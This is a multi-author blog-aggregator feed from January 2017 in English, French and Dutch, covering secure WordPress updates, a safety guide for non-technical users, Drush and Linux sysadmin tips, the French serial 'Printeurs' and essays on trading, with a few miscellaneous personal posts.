Since WordPress 3.7, support has been added to auto-update WordPress installations in case critical vulnerabilities are discovered. I praised them for that -- I really love that feature. It requires 0 effort from the website maintainer.

But that obviously poses a threat, as Scott explains:

Currently, if an attacker can compromise api.wordpress.org, they can issue a fake WordPress update and gain access to every WordPress install on the Internet that has automatic updating enabled. We're two minutes to midnight here (we were one minute to midnight before the Wordfence team found that vulnerability).

Given WordPress's ubiquity, an attacker with control of 27% of websites on the Internet is a grave threat to the security of the rest of the Internet. I don't know how much infrastructure could withstand that level of DDoS.
#39309: Secure WordPress Against Infrastructure Attacks

Scott has already published several security articles, with Guide to Automatic Security Updates For PHP Developers arguably being the most important one for anyone designing and creating a CMS.

Just about every CMS, from Drupal to WordPress to Joomla, uses a weak update mechanisme: if an attacker manages to take control over the update server(s), there's no additional proof they need to have in order to issue new updates. This poses a real threat to the stability of the web..

Securing auto-updates

For WordPress, a federated authentication model is proposed.

It consists of 3 key areas, as Scott explains:

1. Notaries (WordPress blogs or other services that opt in to hosting/verifying the updates) will mirror a Merkle tree which contains (with timestamps and signatures):
--- Any new public keys
--- Any public key revocations
--- Cryptographic hashes of any core/extension updates

2. WordPress blogs will have a pool of notaries they trust explicitly. [...]

3. When an update is received from the server, after checking the signature against the WP core's public key, they will poll at least one trusted Notary [..]. The Notary will verify that the update exists and matches the checksum on file, and respond with a signed message containing:
--- The challenge nonce
--- The response timestamp
--- Whether or not the update was valid

This will be useful in the event that the WP.org's signing key is ever compromised by a sophisticated adversary: If they attempt to issue a silent, targeted update to a machine of interest, they cannot do so reliably [..].
#39309: Secure WordPress Against Infrastructure Attacks

This way, in order to compromise the update system, you need to trick the notaries too to accept the false update. It's no longer merely dependent on the update system itself, but uses a set of peers to validate each of those updates.

Show Me The Money Code

The first patches have already been proposed, it's now up to the WordPress security team to evaluate them and implement any concerns they might have: patch1 and patch2.

Most of the work comes from a sodium_compat PHP package that implements the features provided by libsodium, a modern and easy-to-use crypto library.


Source: #39309

Because WordPress supports PHP 5.2.4 and higher (this is an entirely different security threat to WordPress, but let's ignore it for now), a pure PHP implementation of libsodium is needed since the PHP binary extensions aren't supported that far back. The pecl/libsodium extension requires at least PHP 5.4 or higher.

Here's hoping the patches get accepted and can be used soon, as I'm pretty sure there are a lot of parties interested in getting access to the WordPress update infrastructure.

The post WordPress to get secure, cryptographic updates appeared first on ma.ttias.be.

January 15, 2017

If your non-geek partner and/or kids are joining you to FOSDEM, they may be interested in spending some time exploring Brussels while you attend the conference. Like previous years, FOSDEM is organising sightseeing tours.

January 14, 2017

Although I feel time has not been kind to Laurent Garnier’s music (it sounds rather dated now, but it could just as well be me getting old), but I do love listening to his “It is what it is”-radioshow on Radio Meuh which he duefully also uploads to his SoundCloud-account. Garnier’s musical taste, which he displays in his radioshow, is that broad that every show there’s at least one song that I get all excited about. This time it’s a solo improvisation from Bill Evans from back in 1958, titled “Peace Piece”. So beautiful!

YouTube Video
Watch this video on YouTube.

I published the following diary on isc.sans.org: “Backup Files Are Good but Can Be Evil“.

Since we started to work with computers, we always heard the following advice: “Make backups!”. Everytime you have to change something in a file or an application, first make a backup of the existing resources (code, configuration files, data). But, if not properly managed, backups can be evil and increase the surface attack of your web application… [Read more]

[The post [SANS ISC Diary] Backup Files Are Good but Can Be Evil has been first published on /dev/random]

January 13, 2017

Un soir d’août 2013, je me mis à écrire un début d’histoire qui me trottait dans la tête. Il est toujours difficile de dire d’où proviennent les idées mais peut-être avais-je fait évoluer « Les non-humains », un couple de nouvelles écrites en 2009 et 2012 dont j’avais préparé un tome 3 sans jamais l’achever.

Le thème de mon histoire était assez clair et le titre s’était imposé immédiatement : Printeurs.

Par contre, je n’avais aucun plan, aucune structure. Ma seule volonté était de placer la phrase qui clôturera le second épisode :

« Je suis pauvre mais je sais penser comme une riche. Je vais changer le système. »

Mon défi ? Publier un épisode par semaine et voir où me conduirait l’histoire.

Une nuit de septembre 2013, après 5 épisodes publiés, je me suis retrouvé dans un hôtel du centre-ville de Milan sans inspiration, sans envie de continuer.

Mes doigts se sont mis spontanément à écrire une autre histoire qui balbutiait dans mon cerveau, une histoire inspirée directement par les témoignages de survivants des camps de concentration nord-coréens et la découverte que ces prisonniers produisent des jouets ou des biens bon-marchés vendu en ce moment dans le reste du monde.

Avec ce très violent épisode 6, Printeurs se transforma. D’un feuilleton pulp cyberpunk gentillet, il devint une plongée noire et obscène dans ce que notre monde a de plus repoussant.

Le ton était donné : Printeurs n’allait pas ménager la sensibilité du lecteur.

Sans effort, les deux histoires de Nellio et de 689 continuèrent en parallèle tout en convergeant graduellement.

En cours d’écriture, le personnage d’Eva changea radicalement de finalité. Tout se mettait en place sans planification, sans effort conscient de ma part.

Malheureusement, Printeurs passa plusieurs fois au second plan pour de longs mois. Mais quelques lecteurs acharnés n’hésitaient pas à le réclamer et je voudrais les remercier : demander la suite d’un épisode est la plus belle des récompenses que vous pouviez me faire.

Au final, il m’a fallu 3 ans et demi pour finir les 51 épisodes de Printeurs et mettre un point final aux pérégrinations de Nellio, Eva et 689. J’avoue tirer une certaine fierté d’une particularité involontaire : dans une seule histoire cohérente, Printeurs se paie le luxe d’explorer de manière quasi-exhaustive toutes les interactions possibles entre le corps, la conscience et la technologie.

Terminer Printeurs est également un soulagement. En novembre 2013, en plus de Printeurs, je me suis lancé dans le challenge NaNoWriMo avec pour objectif d’écrire le roman : « L’Écume du temps ».

Les premiers 50.000 mots de ce roman ont bien été écrits mais je n’ai jamais achevé le reste, tiraillé en permanence entre me replonger dans l’Écume du Temps ou dans Printeurs.

J’ai donc décidé d’envoyer cette première version bêta et non-relue de Printeurs à tous ceux qui ont soutenu mon NaNoWrimo. Avec une promesse solennelle : désormais, je vais replonger dans l’Écume du Temps qui est très différent et beaucoup plus structuré que Printeurs.

Dans le courant du mois de janvier, j’enverrai également cette première version de Printeurs au format Epub à ceux qui me soutiennent sur Tipeee. Pour les autres, je vous invite à lire la série sur ce blog, dans l’Epub qui contient les 19 premiers épisodes ou sur Wattpad. Les derniers épisodes seront publiés sur ce blog progressivement.

J’espère que vous aurez autant de plaisir à lire Printeurs que j’en ai eu à l’écrire. Et si vous avez un éditeur dans votre carnet d’adresses, sachez que je serais enchanté de tenir dans mes mains une version papier de ce qu’est devenu et deviendra Printeurs.

Merci pour votre soutien, vos corrections, vos encouragements et…bonne lecture !

 

Photo par Eyesplash.

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

I published the following diary on isc.sans.org: “Who’s Attacking Me?“.

I started to play with a nice reconnaissance tool that could be helpful in many cases – offensive as well as defensive. “IVRE” (“DRUNK” in French) is a tool developed by the CEA, the Alternative Energies and Atomic Energy Commission in France. It’s a network reconnaissance framework that includes… [Read more]

[The post [SANS ISC Diary] Who’s Attacking Me? has been first published on /dev/random]

January 11, 2017

The post Staying Safe Online – A short guide for non-technical people appeared first on ma.ttias.be.

Help, my computer's acting up!

If you know a thing or two about computers, chances are you've got an uncle, aunt, niece or nephew that's asked for your help in fixing a computer problem. If the problem wasn't hardware related, it was most likely malware, a virus, ransomware or drive-by-installations of internet toolbars.

Instead of fixing the problems after the infections, let's do some preventive work: this is a guide to staying safe online, for non technical people. This means it won't cover things like 2FA because I think the problem is much more basic: how to keep your computer and information clean and safe.

The goal is to have this be a guide you can share with your relatives and result in them having a safer computer with less problems that need fixing. If you agree with these pointers, go ahead and share the link!

If you are said relative or friend: this won't take more than 30 minutes and you don't need to be a wizard IT guru to implement these fixes. Please, take your time and configure your computer, you'll be much safer because of it.

Enable auto-updates on all your devices

The number 1 problem with broken or infected computers it outdated software. Yes, an update can break your system, but you're much more likely to have a compromised computer by the lack of updates than the other way around.

For all your devices, enable auto-updates. That means:

  • Your laptop, PC, Mac, ...
  • Your iPhone or Android device
  • Your iPad or Android tablet

Enabling auto updates usually isn't very hard. Go to your settings screen and find the Updates or Upgrades section. Mark the checkbox that says "Install updates automatically".

Don't reuse your passwords or PINs, use passphrases

But Mattias, I can't remember more than 5 different passwords!

Good. Neither can I! That's why I have tools that help me with that. Tools like 1 Password.

They work really simple:

  • You install the app and a browser extension (it's easier than it sounds, just click next, next & next in the installer)
  • You pick a strong, unique passphrase for your 1 Password master password
  • You let 1 Password generate a random, unique, password for your online accounts

Here's the reasoning: your password right now is probably something like "john1". You added the number 1 a few years ago, because some website insisted that you add a numerical value to your password.

Or you're at john17, because every few months work makes you change your password and you increment the number. But these passwords are insanely easy to guess, hack or brute force. Don't bother, you might as well not have a password.

There's a famous internet comic that explains this very well, but it's all very nerdy. The summary is: you're better of using passphrases instead of passwords.

After you've installed 1 Password, it will ask you for the master password of your password vault. Make it a sentence. Did you know you can use spaces in a password? And comma's, exclamation marks and questions marks? You could use "I followed Mattias his security advice!" as a password and it would be safe as hell. Spaces and exclamation mark included.

It's got so many characters, even the fastest computers in the world would take ages to guess.

Now, whenever you need to make a new account for a Photo printing service, an online birth list, your kids' high school, ... don't reuse your same old password, let 1 Password generate a password for you.

Next time you visit that website, you don't have to remember the password, 1 Password can tell you.

If you've reused your current password on Facebook, Gmail and all other websites, now would be a very good time to reset them all to something completely random, managed in your 1 Password.

Install an adblocker in your browser

First, you should be using either Google Chrome or Firefox. If you're using Internet Explorer, Edge, Safari or something else, you might want to switch. (Note: it's not just personal preference, Internet Explorer is much more likely to be the target of a hack and you need a browser that supports "extensions" to install an adblocker)

You'll want to block ads on the web not just because they're ugly, but because they can contain viruses and you're probably going to be browsing to websites that are using shady advertising partners that are up to no good.

Now that you're on Chrome or Firefox, install uBlock Origin, probably the best adblocker you can get today.

Once you have it installed, you should see a red badge icon appear in your browser: 

Don't bother with that little counter, as long the icon is red, the plugin is active and blocking ads and other potential sources of malware for you.

If you have other adblockers, like Adblock Plus, go ahead and remove them. They slow your browser down, you don't need those of if you have uBlock Origin.

Offsite Back-ups

Do you like the data on your computer? Those pictures from your grand children, the excel sheets with your expenses and the biography you've been working on for years? Then you'll definitely care about keeping your data safe in case of a disaster.

Disasters can come in many forms: hardware failure, ransomware, a virus, theft, your house burns down, ...

If you take copies a USB disk once in a while: good for you. But it's not enough. You want to store your back-ups outside your home.

And it isn't as complex as it sounds. The only catch, it costs a bit of money. But trust me, your data is worth this if you ever need to restore the back-up.

My recommendation for an easy-to-use tool is Backblaze: it's 5$ per month, fixed price, for unlimited storage.

You install the tool (again: click next, next & next), it'll back-up all files of your computer and send it to the cloud, encrypted. If you ever need to restore it, log in to your Backblaze account and download the files.

Remember, your back-up account contains all your valuable data, choose a strong passphrase for the account and save it in your 1 Password!

Odd emails from strangers or relatives

It's something we call phishing emails, where someone sends you an email, which looks very legitimate, and tries to fool you into browsing to a website that isn't real.

The most likely targets are: your banking website, electrical or phone bill websites, your facebook/gmail/... account page, ...

If you receive an e-mail and you're not sure what to do: reply and ask for clarification. If it's a spammer or someone trying to trick you, chances are they won't reply.

If they replied and you're still not convinced: forward to someone in IT you know, they'll happily say "yes" or "no" to determine the safety and validity of the email. In most cases, we can tell really quickly because we see them all the time.

About those porn sites ...

Yes, the P word. I have to go there.

If my history of fixing other people's computers has thought me one thing: if your PC is infected with a virus, it's probably because you visited a dirty website.

So let's make a deal and agree never to discuss this in public:

  • PornHub: Don't go to weird Fetish websites, stick to the popular and big ones like PornHub (trust me, they're famous)
  • Go private: When you browse them, use your browser's incognito mode to prevent cookies & your browser history from remembering what you did. You do this by clicking the 3 dots in the upper right corner () and choosing New incognito window.
  • Adblocker: When you visit such a website, make sure you have uBlock Origin installed, the adblocker. Shady websites do shady things to make money.

And if a link looks shady: don't click on it. Please.

Want to go beyond these steps and optimally secure your computer? Check out DecentSecurity.com and follow their guides.


If you found these tips useful to you, please help me spread awareness by sharing this post on your social network (Facebook, Twitter, ...) using the buttons below this post.

Good luck!

The post Staying Safe Online – A short guide for non-technical people appeared first on ma.ttias.be.

The post A collection of Drupal Drush one liners and commands appeared first on ma.ttias.be.

Some quick one-liners that can come in handy when using drush, Drupal's command line interface.

Place all websites in Drupal maintenance mode

$ drush @sites vset site_offline 1

Place a specific multi-site website in maintenance mode

$ drush -l site_alias_name vset site_offline 1

Take all sites out of maintenance mode

$ drush @sites vset site_offline 0

Set the cache lifetime for all sites to 1800 seconds

$ drush @sites vset cache_lifetime 600
$ drush @sites vset page_cache_maximum_age 1800

List all sites in a multi-site drupal setup

$ drush @sites status
You are about to execute 'status' non-interactively (--yes forced) on all of the following targets:
  /var/www/html/site#multisite_A
  /var/www/html/site#multisite_B
Continue?  (y/n):
...

Flush all caches (varnish, memcached, ...)

$ drush @sites cc all

Disable drupal's cron

$ drush @sites vset cron_safe_threshold 0

If you know any more life-saving drush commands (you know the kind, the ones you need when all hell breaks loose and everything's offline), let me know!

The post A collection of Drupal Drush one liners and commands appeared first on ma.ttias.be.

The post Show the environment variables of a running process in Linux appeared first on ma.ttias.be.

A quick mental dump in case I forget it again next time. First, check your PID:

$ ps faux | grep 'your_process'
508      28818  0.0  0.3  44704  3584 ?        Sl   10:10   0:00  \_ /path/to/your/script.sh

Now, using that PID (in this case, 28818), check the environment variables in /proc/$PID/environ.

$ cat /proc/28818/environ
TERM=linuxPATH=/sbin:/usr/sbin:/bin:/usr/binrunlevel=3RUNLEVEL=3SUPERVISOR_GROUP_NAME=xxxPWD=/path/to/your/homedirLANGSH_SOURCED=1LANG=en_US.UTF-8previous=NPREVLEVEL=N

Now to get that output more readable, parse the null character (\0) and replace them by new lines (\n) for readability.

$ cat /proc/28818/environ | tr '\0' '\n'
TERM=linux
PATH=/sbin:/usr/sbin:/bin:/usr/bin
runlevel=3
RUNLEVEL=3
SUPERVISOR_GROUP_NAME=xxx
PWD=/path/to/your/homedir
LANGSH_SOURCED=1
LANG=en_US.UTF-8
previous=N
PREVLEVEL=N

Alternatively (but equally hard to read), you can add the e modifier to ps to also show all environment variables. I personally find /prod easier to interpret, since it's only the environment variables.

$ ps e -ww -p 28818
  PID TTY      STAT   TIME COMMAND
28818 ?        Sl     0:00 /path/to/your/script.sh TERM=linux PATH=/sbin:/usr/sbin:/bin:/usr/bin runlevel=3 RUNLEVEL=3 SUPERVISOR_GROUP_NAME=xxx PWD=/var/www/vhosts/worker.nucleus.be/cron-tasks LANGSH_SOURCED=1 LANG=en_US.UTF-8 previous=N

If you've got other tricks, I'd love to hear about them!

The post Show the environment variables of a running process in Linux appeared first on ma.ttias.be.

Comme beaucoup de gens, vous avez probablement un peu d’argent sur un compte d’épargne. Vous râlez que les taux d’intérêt soient si bas, cela ne vous rapporte rien ! Vous pensez également que les traders sont d’ignobles cyniques qui se font des millions sur votre dos, qu’ils sont responsables de la crise.

Moi, en tout cas, j’étais comme cela il n’y a pas si longtemps.

Et je ne me rendais pas compte à quel point ces positions sont bourrées de contradictions.

Le Bitcoin et la monnaie

Passionné par la décentralisation, je découvre un jour de 2010 le projet Bitcoin, qui construit une monnaie décentralisée. Le principe même du projet m’amène à découvrir le rôle complexe des banques dans la création monétaire.

Naïvement, je pensais que les banques prêtaient l’argent des épargnants. En réalité, un emprunt n’étant que la simple écriture d’une somme sur un compte, les banques peuvent prêter presqu’autant d’argent qu’elles le veulent. Elles créent littéralement de l’argent en prêtant. Cette création est cependant régulée par la loi. Au final, les banques doivent garder 1% de l’argent qu’elles prêtent dans leurs coffres.

Cela signifie que si vous mettez 1000€ sur un compte d’épargne, vous autorisez la banque à créer 100.000€ de prêts.

Les banques contrôlent donc l’argent et, par conséquence, le monde !

Le trading

En achetant, avec beaucoup de maladresse, des bitcoins, je découvris également le trading. Comme le nom l’indique, le trading consiste uniquement à acheter ou vendre un bien. Comme dans tout achat, il y’a un vendeur et un acheteur. Les deux sont convaincus de faire une bonne affaire.

Un trader professionnel cherche à acheter lorsqu’il pense que le bien va prendre de la valeur. Il va vendre lorsqu’il pense qu’au contraire les prix vont chuter.

Le fait d’acheter dans le but de revendre ultérieurement est appelé la spéculation.

Vu comme ça, difficile de trouver quoi que ce soit à redire. Si deux personnes souhaitent faire une transaction commerciale de leur plein gré, c’est parfaitement honnête.

Et pour peu que nous ayons de l’argent qui ne nous est pas utile immédiatement, nous allons naturellement spéculer en “plaçant notre argent”. Exiger un taux d’intérêt sur notre compte d’épargne, au fond, n’est que la spéculation la plus basique.

Alors, en quoi le trading serait-il à ce point amoral ?

Le prix et le cours

Une profonde incompréhension que le grand public a du trading est la fluctuation du prix. Celle-ci est perçue comme magique, dirigée par une sorte de pouvoir suprême.

En réalité, le prix n’est jamais fixé que par les ventes/achats successifs.

Si je possède un lingot d’or que je souhaite vendre 1000€ mais que personne ne veut l’acheter, c’est que je suis sans doute trop cher. De même, si je ne trouve pas de lingot d’or à acheter à 500€, c’est que je dois payer plus.

Le prix se fixe dès qu’il y’a un accord entre deux personnes.

Si plus personne ne veut acheter mon lingot, je vais descendre le prix de plus en plus. Parfois, de manière catastrophique. C’est ce qu’on appelle un crash.

Si, au contraire, une raison quelconque pousse tout le monde à acheter un lingot mais que l’offre n’est pas suffisante, le prix va monter.

En théorie, personne n’interfère dans les prix. L’offre et la demande sont le fruit des émotions humaines et le prix n’en est que le reflet. En ce sens, le trading cherche à comprendre la psychologie de la foule humaine.

Les acteurs économiques

Dans un tel système d’échange, les personnes faisant du bénéfice ne le font que parce que d’autres ont fait des pertes.

Mais il est important de remarquer que ceux qui ont perdu ont pris un risque, de leur plein gré, dans le seul et unique but de faire du gain. Ils ont acheté quelque chose dont ils n’avaient pas besoin en espérant le revendre.

Sur les marchés boursiers, par exemple, l’argent présent provient des grandes entreprises, des riches investisseurs et des banques.

Lorsqu’un trader fait fortune en jouant avec son propre argent, c’est donc sur le dos des grandes entreprises, des riches investisseurs et des banques.

Par comparaison, la majorité des publicitaires et des marketeux tentent de faire en sorte que les gens normaux, voire pauvres, dépensent leur argent. Si trader n’est probablement pas le métier le plus utile à la société, il me semble au fond bien plus moral qu’une panoplie d’autres métiers pourtant considérés comme respectables.

Retournement de situation : le trading ne serait pas une activité foncièrement nocive !

L’argent des banques

Si le trading est un outil moralement neutre, il peut comme tout outil être détourné.

Souvenez-vous qu’avec vos 1000€, les banques peuvent en créer 100.000€. La tentation est grande d’utiliser ces 100.000€ pour faire encore plus de profit à travers la spéculation.

Et c’est bien ça le nœud du problème : les banques peuvent jouer beaucoup d’argent. La probabilité est donc énorme de faire des gains substantiels.

Ces gains bénéficieront en immense majorité aux banques elles-mêmes, c’est pourquoi le milieu de la finance nous semble tellement déconnecté de notre univers. Une minuscule partie des gains vous sera cependant reversée : les intérêts.

En exigeant des intérêts sur votre compte d’épargne, vous encouragez, voire vous exigez que les banques jouent avec votre argent.

Si vous êtes contre le trading, alors assurez-vous de quitter toute banque qui propose un taux d’intérêt pour votre épargne et qui au contraire vous facture pour ses services !

Tout le monde est donc content de ce petit jeu. Jusqu’au jour où les banques perdent.

À ce moment là, soudainement, l’effet de levier qui a multiplié vos 1000€ en 100.000€ a l’effet inverse. Les banques n’ont plus de liquidités et se mettent en faillite.

À l’exception de l’Islande, la plupart des banques dans cette situation ont été renflouées… par l’état et donc par l’argent de nos impôts.

En résumé, les banques sont des entités qui encaissent des bénéfices réalisés grâce à notre argent et que nous devons renflouer en cas de pertes !

L’utilité du trading

Les traders que j’ai rencontré arguent que le trading est une activité utile qui permet aux prix de trouver leur valeur naturelle. Certains outils financiers permettent même aux producteurs de matières premières de s’assurer contre, par exemple, une mauvaise récolte.

Quoi qu’on pense du trading, difficile de considérer qu’il soit immoral pour deux personnes consentantes de faire une transaction commerciale.

Effectivement, on peut penser que les bénéfices du trading sont potentiellement sous-taxés par rapport à ceux du travail, que les lois actuelles avantages les riches. Ce n’est alors pas le trading qu’il faut critiquer mais les lois écrites par ceux que nous avons élus.

Au final, les traders ne font qu’essayer de s’enrichir sur le dos des capitalistes qui cherchent eux-même à s’enrichir toujours plus. Est-ce qu’on peut vraiment les blâmer pour cela ?

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

We have just published the second set of interviews with our main track speakers. The following interviews give you a lot of interesting reading material about various topics: Benedict Gaster (cuberoo_): LoRaWAN for exploring the Internet of Things . Talk Hard: A technical, political, and cultural look at LoRaWAN for IoT Brooks Davis: Everything You Always Wanted to Know About "Hello, World"*. (*But Were Afraid To Ask) Daniel Stenberg: You know what's cool? Running on billions of devices. curl from A to Z Keith Packard: Free Software For The Machine Klaus Aehlig: Bazel. How to build at Google scale? Rich舰

January 10, 2017

The Wifi connection of this machine is very slow, especially noticeable when logging in to the machine via ssh.
The solution is to follow the notes on https://wiki.debian.org/rtl819x , copied here:

Devices supported by this driver may suffer from intermittent connection loss. If so, it can be made more reliable by disabling power management via module options ipsand fwlps. These can be supplied by creating a new file:
/etc/modprobe.d/rtl8192ce.conf


  • options rtl8192ce ips=0 fwlps=0


January 08, 2017

Ceci est le billet 43 sur 43 dans la série Printeurs

Après avoir échappé à un attentat, Nellio, Eva, Junior et Max sont dans une voiture de police qui fonce vers le siège du conglomérat de la zone industrielle.

— Ah, voilà !

Du doigt, Junior pointe une long ligne noire qui strie le ciel. La ligne est bientôt rejointe par une seconde et puis une troisième, dessinant une étrange arabesque, la stylisation d’une étroite fleur de pénombre se refermant, s’épaississant, ondulant dans une imperceptible sarabande filaire.

— Les drones, explique Junior ! À proximité de la zone industrielle, les couloirs aériens sont tellement chargés qu’on peut observer de véritables embouteillages de drones.

Rêveur, je contemple les longues ligne noires, étranges chrysanthèmes de pénombre se détachant dans l’uniformité grisonnante. À mesure que nous nous rapprochons, les drones individuels commencent à se distinguer, la ligne se fait discontinue, pointilée.

— Et dire que les politiciens sont fiers de leur intertube !

— À l’époque où le projet d’intertube a été lancé, les drones n’avaient pas encore l’autonomie ni la capacité de levage suffisante. De plus, les drones posent des problèmes au niveau de l’espace aérien sans compter les risques d’interception et de vols.

— Tout ces problèmes ont été résolus, fais-je. Mais c’est justement la constante du métier de politicien : ne pas voir que le monde évolue, que les problèmes peuvent être résolus. D’ailleurs, qu’est-ce qu’un politicien sans problème ? Un politicien qui ne peut pas promettre de solution et ne sera donc pas réélu. Les politiciens ne veulent pas que le monde change. Les électeurs non plus. Ils promettent le changement avec un grand « C », celui où tout restera pareil. Au fond, ils promettent exactement ce que nous voulons entendre.

— Pourtant, intervient Junior, s’ils ont continué à investir dans l’intertube, c’est qu’il doit bien y avoir une raison.

— Oh oui, il y en a une ! Celle de ne pas être celui qui reconnaîtra que le gouvernement ne fait pas d’erreur. Les erreurs, généralement, tu es forcé de les reconnaître quand elles te coûtent de l’argent. Et encore, les individus préfèrent parfois continuer à payer plutôt que d’admettre s’être trompé. Mais si ce n’est pas ton argent que tu dépenses et que reconnaître une erreur peut te coûter ton travail, il n’y a absolument aucun incitant à arrêter les entreprises les plus catastrophiques. Sans compter que le chantier de l’intertube crée de l’emploi. Des milliers de travailleurs qui vont creuser des trous inutiles dans les sous-sols de la ville, qui vont s’échiner, se crever, passer leurs journées sous terre pour faire un travail complètement inutile et qui aurait pu être automatisé. Tout ça pour avoir l’impression d’être moralement supérieur à un télé-pass. Vous voulez que je vous dise ? On accuse les politiciens, les riches, les industriels et même les télé-pass de tous les maux. Mais les véritables responsables, ce sont ceux qui font ce qu’on leur dit, qui accomplissent un travail inutile le plus consciencieusement possible par peur de perdre les maigres avantages qui vont avec. Ceux-là sont responsables.

— Et ceux-là, c’est nous, conclut Junior.

— Oui. C’est nous. Et nous n’avons aucune excuse.

— Nous n’avions peut-être pas le choix…

— Le seul choix que nous n’avons pas est celui de naître. Après cela, chaque respiration, chaque pas est un choix. Le choix, il se prend, il s’arrache, il se gagne. Mais il est tellement plus facile de se persuader que nous n’avons pas le choix, de nous conforter dans les rails que l’infinité de non-choix a tracé pour nous. Le choix, nous le refusons, nous le fuyons comme la peste. Et nous allons un jour payer le prix de notre inconséquence, de notre irresponsabilité.

— Naître est pourtant le seul choix que j’aie jamais fait.

Intrigué, je me tourne vers Eva, qui vient de m’interrompre.

— Que veux-tu dire ?

— Nellio…

— Vous vous expliquerez plus tard car nous sommes arrivés au complexe du conglomérat industriel.

Observant la route défiler, je constate que nous nous approchons d’un contrôle de sécurité. Deux agents se tiennent au garde-à-vous derrière la ligne rouge, tracée sur le sol, où la voiture devra forcément s’arrêter. Je déglutis avec peine en constatant que nous n’avons aucun papier, aucune excuse valable pour être dans ce quartier et que nous sommes recherchés.

— Merde, le contrôle. J’avais oublié. Une solution miracle pour nous sortir de là ?

Au fur et à mesure que nous nous rapprochons de la ligne, un doute m’envahit. La voiture ne semble pas ralentir. Au contraire, nous accélérons. Dans les yeux des agents de sécurité, je lis le même doute se transformer soudain en peur puis en panique. Ils n’ont que le temps de plonger chacun d’un côté alors que la voiture les frôle à pleine vitesse.

— Hein ? Comment est-ce possible ? Nous avons passé le contrôle sans être arrêtés !

Junior me lance un clin d’œil dans le rétroviseur.

— C’est l’avantage du mode manuel. Il est devenu tellement rare et réservé aux forces de sécurité que la plupart des barrages se font uniquement par contrôle du logiciel de conduite.

— Mais cela signifie que le moindre terroriste pourrait…

— Oui. Mais ils ne le font pas. Ce qui prouve bien que les terroristes sont beaucoup moins formés et intelligents que ce qu’on veut bien nous dire. En fait, le but d’un contrôle routier n’est pas vraiment d’arrêter les terroristes mais de convaincre les citoyens que la menace est réelle et que toutes les mesures sont prises.

— Et je suppose que, en prime, ça fait de l’emploi…

— Énormément d’emploi. Depuis les trouffions comme nos deux vaillants plongeurs sur bitume aux responsables des commissariats.

— Quelle système profondément malhonnête ! Et dire que les responsables de tout ça le savent, qu’ils se moquent cyniquement de nous.

— Oh, pas la peine d’invoquer la malhonnêteté lorsque l’incompétence suffit. Tu sais Nellio, j’ai été amené à fréquenter de très haut gradés. Et tous, sans exception, sont convaincus du bien-fondé de leur mission.

— Mais comment expliques-tu pareille incompétence ?

— Premièrement parce que l’être humain a une capacité incroyable de ne pas voir ce qui pourrait perturber sa manière de penser. Le fait que les religions existent encore aujourd’hui l’illustre amplement. Ensuite parce que c’est l’essence même du système ! Si les gens faisaient bien leur boulot…

— …Il n’y aurait plus de boulot. C’est logique ! Du coup, plus on est incompétent, plus on crée de l’emploi, mieux on est perçu !

Nous sommes interrompus par Max, qui de sa voix douce et chaude nous fait une annonce digne des meilleurs vols transatlantiques.

— Incompétence qui atteint son sommet et sa splendeur ici, Mesdames et Messieurs, au siège du conglomérat industriel, épicentre de la création d’emploi et de la concentration des richesses. Bienvenue !

Sans que je puisse en expliquer la raison, mon cœur se serre alors que je lève les yeux vers le grand building.

— C’est donc ici que tout va se jouer…

 

Photo par Jin Mikami.

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

January 07, 2017

I published the following diary on isc.sans.org: “Using Security Tools to Compromize a Network“.

One of our daily tasks is to assess and improve the security of our customers or colleagues. To achieve this use security tools (linked to processes). With the time, we are all building our personal toolbox with our favourite tools. Yesterday, I read an interesting blog article about extracting saved credentials from a compromised Nessus system. [Read more]

[The post [SANS ISC Diary] Using Security Tools to Compromize a Network has been first published on /dev/random]

Er is iets waar ik mij al een tijdje onwaarschijnlijk druk in maak: Aanmaakblokskens.

Er bestaat een bepaald merk aanmaakblokskens die geen ECO label hebben (dus hun marketingjongens hebben de moeite niet gedaan om de drukker van het kartonneke te vragen er ECO bij te frommelen). Die blijken kei goed te werken. Want daar zit, vermoedelijk, gewoon naft of zo in. Dus, dat werkt. Logisch.

Daarnaast heb je ongelofelijk veel andere merken die niet werken. Je moet er letterlijk twintig tot dertig seconden een vlam op houden. Daardoor heb je meer aanstekergas nodig, verbrand je vaker je vingers en maak je je handen sneller vuil aan de kachel. Met andere woorden, die werken niet.

Dingen die niet werken verkopen na een tijd niet goed.

Dus nu ligt er in tal van supermarkten een te veel aan zogenaamde ecologische aanmaakblokjes, en een te kort aan dat goeie merk. Dat merk dat dus wel werkt.

Nu vraag ik me af: die paar milligram naft, of wat er ook in die goeie blokskens zit, is dat nu zo erg om dat op te fikken als je in je wagen vijftig liter van dat spul tankt? Ik bedoel: een keer draaien met uw stuur op de parking van de supermarkt en je hebt al een paar jaar aanmaakblokjesnaft verbruikt.

Ik wilde het toch maar even kwijt.

January 06, 2017

“Meeting with intel officials ‘constructive,’ hacking had ‘absolutely no effect’ on election. There was no tampering whatsoever with voting machines,” Trump said.

“There had been attempts to hack the Republican National Committee (RNC). However, thanks to the Comittee’s strong hacking defenses, they all failed” Trump said.

“America’s safety and security is a number one priority”, Trump said. He will appoint a team to draft plans on how to repel any cyber attacks on the US in the future. However, he added, “the methods, tools and tactics” of enforcing cyber security would not be made public. “That will benefit those who seek to do us harm,” Trump said.

The king is dead, long live the king.

This is a short summary of my 2016 reading experience, following my 2015 Year In Books.

Such Stats

I’ve read 38 books, most of which novels, up from last years “44”, which included at least a dozen short stories. These totaled 10779 pages, up from 6xxx in both previous years.

Favorites FTW

Peter Watts

Peter Watts

My favorites for 2016 are without a doubt Blindsight and Echopraxia by Peter Watts. I got to know Watts, who is not in my short list of favorite authors, though the short story Malek, which I mentioned in my 2015 year in books. I can’t describe the books in a way that does them sufficient justice, but suffice to say that they explore a good number of interesting questions and concepts. Exactly what you (or at least I) want from Hard (character) Science Fiction.

